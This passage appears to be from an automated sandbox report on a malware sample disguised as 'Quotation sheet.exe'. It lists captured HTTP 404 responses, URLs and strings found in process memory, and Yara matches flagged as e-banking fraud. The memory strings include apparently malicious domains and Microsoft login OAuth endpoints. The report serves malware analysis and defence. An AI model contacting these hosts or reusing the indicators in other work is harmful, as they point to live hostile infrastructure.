                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Nov 2024 10:17:46 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e01838-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Tue, 26 Nov 2024 10:18:11 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Tue, 26 Nov 2024 10:18:14 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Tue, 26 Nov 2024 10:18:16 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 26 Nov 2024 10:18:24 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 26 Nov 2024 10:18:26 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 26 Nov 2024 10:18:29 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 26 Nov 2024 10:18:32 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 26 Nov 2024 10:18:40 GMT
Content-Type: text/html
Content-Length: 409
Connection: close
ETag: "66d016cf-199"
Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank">堡塔 (免费，高效和安全的托管控制面板)</a></div></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 26 Nov 2024 10:18:42 GMT
Content-Type: text/html
Content-Length: 409
Connection: close
ETag: "66d016cf-199"
Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank">堡塔 (免费，高效和安全的托管控制面板)</a></div></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 26 Nov 2024 10:18:45 GMT
Content-Type: text/html
Content-Length: 409
Connection: close
ETag: "66d016cf-199"
Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank">堡塔 (免费，高效和安全的托管控制面板)</a></div></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 26 Nov 2024 10:18:48 GMT
Content-Type: text/html
Content-Length: 409
Connection: close
ETag: "66d016cf-199"
Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank">堡塔 (免费，高效和安全的托管控制面板)</a></div></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Tue, 26 Nov 2024 10:19:27 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61h0aBsMpLZYAVuIixgC6c2tasiU6xi%2BvgtBLdr6%2B%2BUusJuRQKeXdLuLTrP%2BzkYL165pdaj7bPLj9vQy6NCSU4qWbg94PaboI9o5XhoJwzMHxE2KxPPndSgzni2i2I%2B1JNfN%2FML3lA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8923e769fa41a6-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=6155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=621&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Tue, 26 Nov 2024 10:19:30 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNEGVMKrSuD3fie%2FWG29BZDGVkstMMYqum5eXlzYxUazZO6cIEmE6wtQExqAoOsxJ1%2B068vXVKQ4bj6vH5hMbf6Z29ozvIFtZj%2Bc0Umm00BC%2BZsu7vZDqv%2B0D%2Bq%2BfCjdLW2OOVi3FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8923f88ce5c35b-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1463&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=645&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Tue, 26 Nov 2024 10:19:32 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bNR13V4sLxlgAsW4Ga94sQ9gboILyfdeBIavtEmj3d7iZAdtW6u%2Fiay6xavXVPQ4csbmA6VHFXSPBnrqACkHL6yJR7VvJwMIWNiwYz4Pe7hz6psM1gi%2FjNtDJ9rLOVm3dNqWhf%2FstA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e892408f95f8cc0-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1897&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1658&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Tue, 26 Nov 2024 10:19:35 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2alaFL6cxn9%2FkQLp6qGrmekdiGbdymeMHa10MsqovVrLhl%2FGz7ACuOGXYlXRBaaNCZczSM8YEhsrxuGGtFrkxhe%2FJWyb7fR0Ni0br0YaJ1%2FI%2Bdv3zw3ifPwMZFh4AGRgPt31HEsDZg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8924195f8442b8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=365&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$param
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                      Source: Quotation sheet.exe, 00000000.00000002.2338419650.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHKO
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Matteicapital.online
                      Source: UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973090704.0000000002810000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ampsamkok88.shop
                      Source: UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973090704.0000000002810000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ampsamkok88.shop/huvt/
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSikOF
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Capital_Investment_Advisors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEh
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSikO
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Raising_Capital_for_Business.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WE
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Working_Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online
                      Source: pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                      Source: UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?cO
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: pcaui.exe, 00000009.00000003.2641779596.000000000843F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: pcaui.exe, 00000009.00000002.3971801019.000000000319D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: pcaui.exe, 00000009.00000002.3974069413.000000000631E000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.000000000375E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                      Source: pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: pcaui.exe, 00000009.00000002.3974069413.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000032A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: Quotation sheet.exeString found in binary or memory: https://www.mgm.gov.tr/?il=manisa
                      Source: Quotation sheet.exeString found in binary or memory: https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmb
                      Source: Quotation sheet.exeString found in binary or memory: https://www.trtworld.com/#frmActiveBrowsers

                      E-Banking Fraud

                      Source: Yara match. File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match. File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE

                      System Summary

                      Source: initial sample. Static PE information: Filename: Quotation sheet.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FEEDB7_2_053FEEDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053569627_2_05356962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053429A07_2_053429A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0540A9A67_2_0540A9A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534A8407_2_0534A840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053428407_2_05342840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053268B87_2_053268B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E8F07_2_0536E8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FAB407_2_053FAB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F6BD77_2_053F6BD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533EA807_2_0533EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F75717_2_053F7571
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_054095C37_2_054095C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DD5B07_2_053DD5B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FF43F7_2_053FF43F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053314607_2_05331460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FF7B07_2_053FF7B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053856307_2_05385630
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F16CC7_2_053F16CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0540B16B7_2_0540B16B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532F1727_2_0532F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0537516C7_2_0537516C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534B1B07_2_0534B1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F70E97_2_053F70E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FF0E07_2_053FF0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EF0CC7_2_053EF0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053470C07_2_053470C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F132D7_2_053F132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532D34C7_2_0532D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0538739A7_2_0538739A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053452A07_2_053452A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E12ED7_2_053E12ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535B2C07_2_0535B2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F7D737_2_053F7D73
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F1D5A7_2_053F1D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05343D407_2_05343D40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535FDC07_2_0535FDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B9C327_2_053B9C32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FFCF27_2_053FFCF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FFF097_2_053FFF09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053FFFB17_2_053FFFB1
